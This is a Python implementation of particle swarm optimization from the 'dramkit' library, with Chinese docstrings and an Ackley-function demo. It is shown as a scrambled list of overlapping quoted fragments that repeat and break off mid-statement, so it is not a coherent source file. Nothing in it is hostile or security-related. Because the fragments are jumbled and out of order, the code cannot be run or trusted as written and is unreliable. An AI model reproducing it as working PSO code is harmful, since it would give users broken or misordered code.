gBest", "vel[i, j] = v_maxs[j] # if vel[i, j] < v_mins[j]: # vel[i, j]", "parms_opter = {'opter_name': 'pso-test', 'popsize': 30, 'max_iter': 500, 'v_maxs': 5, 'w_max': 0.9, 'w_min':", "# logger = simple_logger() logger = get_logger('./test/log/pso_test.txt', screen_show=True) # parms_log = {'logger': logger,", "import numpy as np from dramkit.gentools import isnull from dramkit.optimizer.utils_heuristic import rand_init def", "* vel[i, j] + \\ # c1 * r1 * (pBest[i, j] -", "* ((w_max - w_min) / max_iter) else: if not 0 < w_fix <", "| kwargs: 目标函数接收的其它参数 | parms_opter: 优化函数参数信息dict,key须包含: | popsize: 群体数量(每轮迭代的样本数量) | max_iter: 最大迭代寻优次数 |", "func_opter_parms.parms_func['kwargs'] # 优化器参数 popsize = func_opter_parms.parms_opter['popsize'] max_iter = func_opter_parms.parms_opter['max_iter'] v_maxs = func_opter_parms.parms_opter['v_maxs'] w_max", "parms_opter, parms_log) func_opter_parms = pso(objf, func_opter_parms) vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals,", "func_opter_parms): ''' 粒子群优化算法(Particle Swarm Optimization) PSO algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ---------- objf", "{}} parms_opter = {'opter_name': 'pso-test', 'popsize': 30, 'max_iter': 500, 'v_maxs': 5, 'w_max': 0.9,", "(pBest - pos) + c2 * r2 * (gBest - pos) vel =", "r2 = random.random() # # 速度更新 # vel[i, j] = w * vel[i,", "pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大 pBest = np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) #", "自变量每个维度取值上界,list或数值,为list时长度应等于dim | dim: 自变量维度数 | kwargs: 目标函数接收的其它参数 | parms_opter: 优化函数参数信息dict,key须包含: | popsize: 群体数量(每轮迭代的样本数量)", "from dramkit import plot_series, simple_logger from dramkit.logtools.logger_general import get_logger from dramkit.logtools.utils_logger import close_log_file", "nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns ------- func_opter_parms : FuncOpterInfo 更新优化过程之后的func_opter_parms References ---------- - https://www.jianshu.com/p/8c0260c21af4 -", "func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max'] w_min = func_opter_parms.parms_opter['w_min'] w_fix = func_opter_parms.parms_opter['w_fix'] c1 = func_opter_parms.parms_opter['c1']", "= func_opter_parms.parms_opter['c1'] c2 = func_opter_parms.parms_opter['c2'] # 日志参数 logger = func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow']", "速度和位置更新 # for i in range(0, popsize): # for j in range (0,", "if not 0 < w_fix < 1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w = w_fix", "Parameters ---------- objf : function 目标函数。注:须事先转化为求极小值问题 func_opter_parms : FuncOpterInfo :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类, 须设置parms_func、parms_opter、parms_log |", "| max_iter: 最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min: 惯性因子最小值 |", "= np.zeros(max_iter) # 平均值 # 迭代寻优 for l in range(0, max_iter): # 位置过界处理", "figsize=(10, 6)) best_x = func_opter_parms.best_x func_opter_parms.parms_log['logger'].info('best x: {}'.format(best_x)) close_log_file(logger) print('used time: {}s.'.format(round(time.time()-strt_tm, 6)))", "vel + c1 * r1 * (pBest - pos) + c2 * r2", "最小值问题初始化为正无穷大 pBest = np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) # 保存全局最优解 gBestVal", "r2 * (gBest - pos) vel = np.clip(vel, v_mins, v_maxs) # 速度过界处理 pos", "c2: 学习因子 | parms_log: 日志参数信息dict,key须包含: | logger: 日志记录器 | nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns -------", "parms_log: 日志参数信息dict,key须包含: | logger: 日志记录器 | nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns ------- func_opter_parms : FuncOpterInfo", "= func_opter_parms.parms_opter['popsize'] max_iter = func_opter_parms.parms_opter['max_iter'] v_maxs = func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max'] w_min =", "w采用线型递减方式动态更新,也可采用其它方式更新 w = w_max - l * ((w_max - w_min) / max_iter) else:", "= pd.DataFrame({'fval_best': func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6)) best_x", "| logger: 日志记录器 | nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns ------- func_opter_parms : FuncOpterInfo 更新优化过程之后的func_opter_parms References", "np.zeros(dim) # 保存全局最优解 gBestVal = float('inf') # 全局最优值 pos = rand_init(popsize, dim, x_lb,", "若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 | 默认动态更新w时采用线性递减方法 | c1, c2: 学习因子 | parms_log: 日志参数信息dict,key须包含: | logger:", "popsize): fval = objf(pos[i, :], **kwargs) # 目标函数值 fvals_mean = (fvals_mean*i + fval)", "func_opter_parms.parms_opter['w_min'] w_fix = func_opter_parms.parms_opter['w_fix'] c1 = func_opter_parms.parms_opter['c1'] c2 = func_opter_parms.parms_opter['c2'] # 日志参数 logger", "r1 * (pBest[i, j] - pos[i,j]) + \\ # c2 * r2 *", "range(0, popsize): # for j in range (0, dim): # r1 = random.random()", "# 更新func_opter_parms end_tm = time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return", "(i+1) # 更新每个个体的最优解(理解为局部最优解) if pBestVals[i] > fval: pBestVals[i] = fval pBest[i, :] =", "# vel[i, j] = w * vel[i, j] + \\ # c1 *", "- pos[i,j]) + \\ # c2 * r2 * (gBest[j] - pos[i, j])", "= (fvals_mean*i + fval) / (i+1) # 更新每个个体的最优解(理解为局部最优解) if pBestVals[i] > fval: pBestVals[i]", "func_opter_parms : FuncOpterInfo 更新优化过程之后的func_opter_parms References ---------- - https://www.jianshu.com/p/8c0260c21af4 - https://github.com/7ossam81/EvoloPy ''' # 参数提取", "v_maxs] # 初始化 vel = np.zeros((popsize, dim)) # 初始速度 pBestVals = np.zeros(popsize) #", "func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return func_opter_parms if __name__ == '__main__': import pandas", "= pso(objf, func_opter_parms) vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r', 'fval_mean':", "| w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 | 默认动态更新w时采用线性递减方法 | c1, c2: 学习因子 | parms_log: 日志参数信息dict,key须包含:", "pBestVals = np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大 pBest = np.zeros((popsize, dim)) #", "''' # 参数提取 opter_name = func_opter_parms.parms_opter['opter_name'] if opter_name == '' or isnull(opter_name): opter_name", "'w_fix': False, 'c1': 2, 'c2': 2} # logger = simple_logger() logger = get_logger('./test/log/pso_test.txt',", "get_logger('./test/log/pso_test.txt', screen_show=True) # parms_log = {'logger': logger, 'nshow': 10} parms_log = {'logger': logger,", "func_opter_parms = pso(objf, func_opter_parms) vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r',", "# for i in range(0, popsize): # for j in range (0, dim):", "in range(dim)] else: v_maxs = [v_maxs] * dim v_mins = [-x for x", "convergence_curve[l] = gBestVal convergence_curve_mean[l] = fvals_mean if nshow: if (l+1) % nshow ==0:", "func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6)) best_x = func_opter_parms.best_x func_opter_parms.parms_log['logger'].info('best x:", "= pos[i, :].copy() # 更新全局最优解 if gBestVal > fval: gBestVal = fval gBest", "= v_mins[j] # # 位置更新 # pos[i, j] = pos[i, j] + vel[i,", "= simple_logger() logger = get_logger('./test/log/pso_test.txt', screen_show=True) # parms_log = {'logger': logger, 'nshow': 10}", "vel = np.zeros((popsize, dim)) # 初始速度 pBestVals = np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) #", "parms_log = {'logger': logger, 'nshow': 100} func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log) func_opter_parms =", "or isnull(opter_name): opter_name = 'pso' func_opter_parms.parms_opter['opter_name'] = opter_name # 目标函数参数 x_lb = func_opter_parms.parms_func['x_lb']", "np.random.random(size=(popsize, dim)) # 速度更新 vel = w * vel + c1 * r1", "fvals_mean = (fvals_mean*i + fval) / (i+1) # 更新每个个体的最优解(理解为局部最优解) if pBestVals[i] > fval:", "* (gBest[j] - pos[i, j]) # # 速度过界处理 # if vel[i, j] >", "func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] # 时间记录 strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) # 边界统一为列表", "= w_max - l * ((w_max - w_min) / max_iter) else: if not", "func_opter_parms.parms_opter['c1'] c2 = func_opter_parms.parms_opter['c2'] # 日志参数 logger = func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] #", "# -*- coding: utf-8 -*- import time import numpy as np from dramkit.gentools", "5, 'w_max': 0.9, 'w_min': 0.2, 'w_fix': False, 'c1': 2, 'c2': 2} # logger", "func_opter_parms.parms_opter['opter_name'] func_name = func_opter_parms.parms_func['func_name'] logger.info('{} for {}, iter: {}, '.format(opter_name, func_name, l+1) +", "'-r', 'fval_mean': '-b'}, figsize=(10, 6)) best_x = func_opter_parms.best_x func_opter_parms.parms_log['logger'].info('best x: {}'.format(best_x)) close_log_file(logger) print('used", "= np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大 pBest = np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解", "* (pBest[i, j] - pos[i,j]) + \\ # c2 * r2 * (gBest[j]", "# 边界统一为列表 if not isinstance(x_lb, list): x_lb = [x_lb] * dim if not", "= func_opter_parms.parms_func['x_lb'] x_ub = func_opter_parms.parms_func['x_ub'] dim = func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs'] # 优化器参数", "l in range(0, max_iter): # 位置过界处理 pos = np.clip(pos, x_lb, x_ub) fvals_mean =", "import TestFuncs from dramkit.optimizer.utils_heuristic import FuncOpterInfo from dramkit import plot_series, simple_logger from dramkit.logtools.logger_general", "x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim | x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim | dim: 自变量维度数 | kwargs: 目标函数接收的其它参数 | parms_opter:", "dim)) # 初始速度 pBestVals = np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大 pBest =", "np.zeros(max_iter) # 平均值 # 迭代寻优 for l in range(0, max_iter): # 位置过界处理 pos", "for x in v_maxs] # 初始化 vel = np.zeros((popsize, dim)) # 初始速度 pBestVals", "max_iter): # 位置过界处理 pos = np.clip(pos, x_lb, x_ub) fvals_mean = 0 for i", "in v_maxs] # 初始化 vel = np.zeros((popsize, dim)) # 初始速度 pBestVals = np.zeros(popsize)", "strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) # 边界统一为列表 if not isinstance(x_lb, list): x_lb =", "+ \\ # c2 * r2 * (gBest[j] - pos[i, j]) # #", "not 0 < w_fix < 1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w = w_fix #", "= {'opter_name': 'pso-test', 'popsize': 30, 'max_iter': 500, 'v_maxs': 5, 'w_max': 0.9, 'w_min': 0.2,", "{'opter_name': 'pso-test', 'popsize': 30, 'max_iter': 500, 'v_maxs': 5, 'w_max': 0.9, 'w_min': 0.2, 'w_fix':", "'-b'}, figsize=(10, 6)) best_x = func_opter_parms.best_x func_opter_parms.parms_log['logger'].info('best x: {}'.format(best_x)) close_log_file(logger) print('used time: {}s.'.format(round(time.time()-strt_tm,", "j]) # # 速度过界处理 # if vel[i, j] > v_maxs[j]: # vel[i, j]", "'nshow': 100} func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log) func_opter_parms = pso(objf, func_opter_parms) vals =", "func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return func_opter_parms if __name__ == '__main__': import pandas as", "# parms_log = {'logger': logger, 'nshow': 10} parms_log = {'logger': logger, 'nshow': 100}", "w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 | 默认动态更新w时采用线性递减方法 | c1, c2: 学习因子 | parms_log: 日志参数信息dict,key须包含: |", "= [(x_ub[_]-x_lb[_]) / 10 for _ in range(dim)] else: v_maxs = [v_maxs] *", "= np.random.random(size=(popsize, dim)) # 速度更新 vel = w * vel + c1 *", "import FuncOpterInfo from dramkit import plot_series, simple_logger from dramkit.logtools.logger_general import get_logger from dramkit.logtools.utils_logger", "优化器参数 popsize = func_opter_parms.parms_opter['popsize'] max_iter = func_opter_parms.parms_opter['max_iter'] v_maxs = func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max']", "pso(objf, func_opter_parms): ''' 粒子群优化算法(Particle Swarm Optimization) PSO algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ----------", "# 更新全局最优解 if gBestVal > fval: gBestVal = fval gBest = pos[i, :].copy()", "速度和位置更新 r1 = np.random.random(size=(popsize, dim)) r2 = np.random.random(size=(popsize, dim)) # 速度更新 vel =", "pos = pos + vel # 位置更新 # 每轮迭代都保存最优目标值 convergence_curve[l] = gBestVal convergence_curve_mean[l]", "x_lb = [x_lb] * dim if not isinstance(x_ub, list): x_ub = [x_ub] *", "np.clip(pos, x_lb, x_ub) fvals_mean = 0 for i in range(0, popsize): fval =", "{}'.format(gBestVal)) # 更新func_opter_parms end_tm = time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest)", "i in range(0, popsize): # for j in range (0, dim): # r1", "References ---------- - https://www.jianshu.com/p/8c0260c21af4 - https://github.com/7ossam81/EvoloPy ''' # 参数提取 opter_name = func_opter_parms.parms_opter['opter_name'] if", "x_ub = func_opter_parms.parms_func['x_ub'] dim = func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs'] # 优化器参数 popsize =", "dim = func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs'] # 优化器参数 popsize = func_opter_parms.parms_opter['popsize'] max_iter =", "# for j in range (0, dim): # r1 = random.random() # r2", "w * vel + c1 * r1 * (pBest - pos) + c2", "j] = w * vel[i, j] + \\ # c1 * r1 *", "''' 粒子群优化算法(Particle Swarm Optimization) PSO algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ---------- objf :", "= np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) # 保存全局最优解 gBestVal = float('inf')", "c1 * r1 * (pBest[i, j] - pos[i,j]) + \\ # c2 *", "100} func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log) func_opter_parms = pso(objf, func_opter_parms) vals = pd.DataFrame({'fval_best':", "= func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] # 时间记录 strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) #", "list): x_ub = [x_ub] * dim if not isinstance(v_maxs, list): if isnull(v_maxs): v_maxs", "= func_opter_parms.parms_func['kwargs'] # 优化器参数 popsize = func_opter_parms.parms_opter['popsize'] max_iter = func_opter_parms.parms_opter['max_iter'] v_maxs = func_opter_parms.parms_opter['v_maxs']", "FuncOpterInfo 更新优化过程之后的func_opter_parms References ---------- - https://www.jianshu.com/p/8c0260c21af4 - https://github.com/7ossam81/EvoloPy ''' # 参数提取 opter_name =", "isinstance(v_maxs, list): if isnull(v_maxs): v_maxs = [(x_ub[_]-x_lb[_]) / 10 for _ in range(dim)]", "= [x_lb] * dim if not isinstance(x_ub, list): x_ub = [x_ub] * dim", "if (l+1) % nshow ==0: opter_name = func_opter_parms.parms_opter['opter_name'] func_name = func_opter_parms.parms_func['func_name'] logger.info('{} for", "list): x_lb = [x_lb] * dim if not isinstance(x_ub, list): x_ub = [x_ub]", "/ 10 for _ in range(dim)] else: v_maxs = [v_maxs] * dim v_mins", "0 < w_fix < 1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w = w_fix # #", "as pd from dramkit.optimizer.base_funcs import TestFuncs from dramkit.optimizer.utils_heuristic import FuncOpterInfo from dramkit import", "= func_opter_parms.parms_opter['max_iter'] v_maxs = func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max'] w_min = func_opter_parms.parms_opter['w_min'] w_fix =", "dim)) # 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) # 保存全局最优解 gBestVal = float('inf') # 全局最优值", "{'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6)) best_x = func_opter_parms.best_x func_opter_parms.parms_log['logger'].info('best x: {}'.format(best_x)) close_log_file(logger)", "< 1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w = w_fix # # 速度和位置更新 # for", "# 最小值问题初始化为正无穷大 pBest = np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) # 保存全局最优解", "# 速度过界处理 # if vel[i, j] > v_maxs[j]: # vel[i, j] = v_maxs[j]", "# w采用线型递减方式动态更新,也可采用其它方式更新 w = w_max - l * ((w_max - w_min) / max_iter)", "目标函数接收的其它参数 | parms_opter: 优化函数参数信息dict,key须包含: | popsize: 群体数量(每轮迭代的样本数量) | max_iter: 最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim", "| v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min: 惯性因子最小值 | w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新", "平均值 # 迭代寻优 for l in range(0, max_iter): # 位置过界处理 pos = np.clip(pos,", "float('inf') # 全局最优值 pos = rand_init(popsize, dim, x_lb, x_ub) # 样本(个体)随机初始化 # 保存收敛过程", "* vel + c1 * r1 * (pBest - pos) + c2 *", "from dramkit.gentools import isnull from dramkit.optimizer.utils_heuristic import rand_init def pso(objf, func_opter_parms): ''' 粒子群优化算法(Particle", "if isnull(v_maxs): v_maxs = [(x_ub[_]-x_lb[_]) / 10 for _ in range(dim)] else: v_maxs", "= func_opter_parms.parms_opter['c2'] # 日志参数 logger = func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] # 时间记录 strt_tm", "coding: utf-8 -*- import time import numpy as np from dramkit.gentools import isnull", "end_tm = time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return func_opter_parms if", "速度更新 # vel[i, j] = w * vel[i, j] + \\ # c1", "np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) # 保存全局最优解 gBestVal = float('inf') #", "kwargs: 目标函数接收的其它参数 | parms_opter: 优化函数参数信息dict,key须包含: | popsize: 群体数量(每轮迭代的样本数量) | max_iter: 最大迭代寻优次数 | v_maxs:", "logger = simple_logger() logger = get_logger('./test/log/pso_test.txt', screen_show=True) # parms_log = {'logger': logger, 'nshow':", "- pos[i, j]) # # 速度过界处理 # if vel[i, j] > v_maxs[j]: #", "pos[i, :].copy() # 更新全局最优解 if gBestVal > fval: gBestVal = fval gBest =", "+ fval) / (i+1) # 更新每个个体的最优解(理解为局部最优解) if pBestVals[i] > fval: pBestVals[i] = fval", "func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs'] # 优化器参数 popsize = func_opter_parms.parms_opter['popsize'] max_iter = func_opter_parms.parms_opter['max_iter'] v_maxs", "time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return func_opter_parms if __name__ ==", "in range(0, popsize): fval = objf(pos[i, :], **kwargs) # 目标函数值 fvals_mean = (fvals_mean*i", "vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6))", "日志参数 logger = func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] # 时间记录 strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d", "pos[i, j] + vel[i, j] # 速度和位置更新 r1 = np.random.random(size=(popsize, dim)) r2 =", "popsize: 群体数量(每轮迭代的样本数量) | max_iter: 最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min:", "* (pBest - pos) + c2 * r2 * (gBest - pos) vel", "最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min: 惯性因子最小值 | w_fix: 若w_fix设置为(0,", "import get_logger from dramkit.logtools.utils_logger import close_log_file strt_tm = time.time() objf = TestFuncs.ackley parms_func", "# 时间记录 strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) # 边界统一为列表 if not isinstance(x_lb, list):", "vel # 位置更新 # 每轮迭代都保存最优目标值 convergence_curve[l] = gBestVal convergence_curve_mean[l] = fvals_mean if nshow:", "= func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max'] w_min = func_opter_parms.parms_opter['w_min'] w_fix = func_opter_parms.parms_opter['w_fix'] c1 =", "if vel[i, j] < v_mins[j]: # vel[i, j] = v_mins[j] # # 位置更新", "全局最优值 convergence_curve_mean = np.zeros(max_iter) # 平均值 # 迭代寻优 for l in range(0, max_iter):", "{}, '.format(opter_name, func_name, l+1) + \\ 'best fval: {}'.format(gBestVal)) # 更新func_opter_parms end_tm =", "= objf(pos[i, :], **kwargs) # 目标函数值 fvals_mean = (fvals_mean*i + fval) / (i+1)", "v_mins = [-x for x in v_maxs] # 初始化 vel = np.zeros((popsize, dim))", "j] = pos[i, j] + vel[i, j] # 速度和位置更新 r1 = np.random.random(size=(popsize, dim))", "pBestVals[i] = fval pBest[i, :] = pos[i, :].copy() # 更新全局最优解 if gBestVal >", "convergence_curve = np.zeros(max_iter) # 全局最优值 convergence_curve_mean = np.zeros(max_iter) # 平均值 # 迭代寻优 for", "c2 * r2 * (gBest[j] - pos[i, j]) # # 速度过界处理 # if", "c1 * r1 * (pBest - pos) + c2 * r2 * (gBest", "j] + vel[i, j] # 速度和位置更新 r1 = np.random.random(size=(popsize, dim)) r2 = np.random.random(size=(popsize,", "PSO algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ---------- objf : function 目标函数。注:须事先转化为求极小值问题 func_opter_parms :", "pBest = np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) # 保存全局最优解 gBestVal =", "# 初始速度 pBestVals = np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大 pBest = np.zeros((popsize,", "r2 = np.random.random(size=(popsize, dim)) # 速度更新 vel = w * vel + c1", "for _ in range(dim)] else: v_maxs = [v_maxs] * dim v_mins = [-x", "algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ---------- objf : function 目标函数。注:须事先转化为求极小值问题 func_opter_parms : FuncOpterInfo", "= np.clip(vel, v_mins, v_maxs) # 速度过界处理 pos = pos + vel # 位置更新", "pos[i, j] = pos[i, j] + vel[i, j] # 速度和位置更新 r1 = np.random.random(size=(popsize,", "| popsize: 群体数量(每轮迭代的样本数量) | max_iter: 最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 |", "v_maxs[j] # if vel[i, j] < v_mins[j]: # vel[i, j] = v_mins[j] #", "粒子群优化算法(Particle Swarm Optimization) PSO algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ---------- objf : function", "- w_min) / max_iter) else: if not 0 < w_fix < 1: raise", "= w * vel[i, j] + \\ # c1 * r1 * (pBest[i,", "nshow: if (l+1) % nshow ==0: opter_name = func_opter_parms.parms_opter['opter_name'] func_name = func_opter_parms.parms_func['func_name'] logger.info('{}", "x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim | dim: 自变量维度数 | kwargs: 目标函数接收的其它参数 | parms_opter: 优化函数参数信息dict,key须包含: | popsize:", "vel[i, j] = w * vel[i, j] + \\ # c1 * r1", "np.clip(vel, v_mins, v_maxs) # 速度过界处理 pos = pos + vel # 位置更新 #", "速度过界处理 # if vel[i, j] > v_maxs[j]: # vel[i, j] = v_maxs[j] #", "{'logger': logger, 'nshow': 100} func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log) func_opter_parms = pso(objf, func_opter_parms)", "# 保存收敛过程 convergence_curve = np.zeros(max_iter) # 全局最优值 convergence_curve_mean = np.zeros(max_iter) # 平均值 #", "c2 = func_opter_parms.parms_opter['c2'] # 日志参数 logger = func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] # 时间记录", "保存全局最优解 gBestVal = float('inf') # 全局最优值 pos = rand_init(popsize, dim, x_lb, x_ub) #", "dramkit import plot_series, simple_logger from dramkit.logtools.logger_general import get_logger from dramkit.logtools.utils_logger import close_log_file strt_tm", "in range(0, popsize): # for j in range (0, dim): # r1 =", "< v_mins[j]: # vel[i, j] = v_mins[j] # # 位置更新 # pos[i, j]", "range(0, max_iter): # 位置过界处理 pos = np.clip(pos, x_lb, x_ub) fvals_mean = 0 for", "nshow ==0: opter_name = func_opter_parms.parms_opter['opter_name'] func_name = func_opter_parms.parms_func['func_name'] logger.info('{} for {}, iter: {},", "import plot_series, simple_logger from dramkit.logtools.logger_general import get_logger from dramkit.logtools.utils_logger import close_log_file strt_tm =", "[v_maxs] * dim v_mins = [-x for x in v_maxs] # 初始化 vel", "(0, dim): # r1 = random.random() # r2 = random.random() # # 速度更新", "FuncOpterInfo from dramkit import plot_series, simple_logger from dramkit.logtools.logger_general import get_logger from dramkit.logtools.utils_logger import", "500, 'v_maxs': 5, 'w_max': 0.9, 'w_min': 0.2, 'w_fix': False, 'c1': 2, 'c2': 2}", "func_opter_parms.parms_opter['opter_name'] if opter_name == '' or isnull(opter_name): opter_name = 'pso' func_opter_parms.parms_opter['opter_name'] = opter_name", "func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) # 边界统一为列表 if not isinstance(x_lb, list): x_lb = [x_lb] * dim", "[x_ub] * dim if not isinstance(v_maxs, list): if isnull(v_maxs): v_maxs = [(x_ub[_]-x_lb[_]) /", "x_ub) # 样本(个体)随机初始化 # 保存收敛过程 convergence_curve = np.zeros(max_iter) # 全局最优值 convergence_curve_mean = np.zeros(max_iter)", "fval: pBestVals[i] = fval pBest[i, :] = pos[i, :].copy() # 更新全局最优解 if gBestVal", "else: v_maxs = [v_maxs] * dim v_mins = [-x for x in v_maxs]", "# 速度更新 vel = w * vel + c1 * r1 * (pBest", "w_fix: # w采用线型递减方式动态更新,也可采用其它方式更新 w = w_max - l * ((w_max - w_min) /", "if not w_fix: # w采用线型递减方式动态更新,也可采用其它方式更新 w = w_max - l * ((w_max -", "j] > v_maxs[j]: # vel[i, j] = v_maxs[j] # if vel[i, j] <", "not 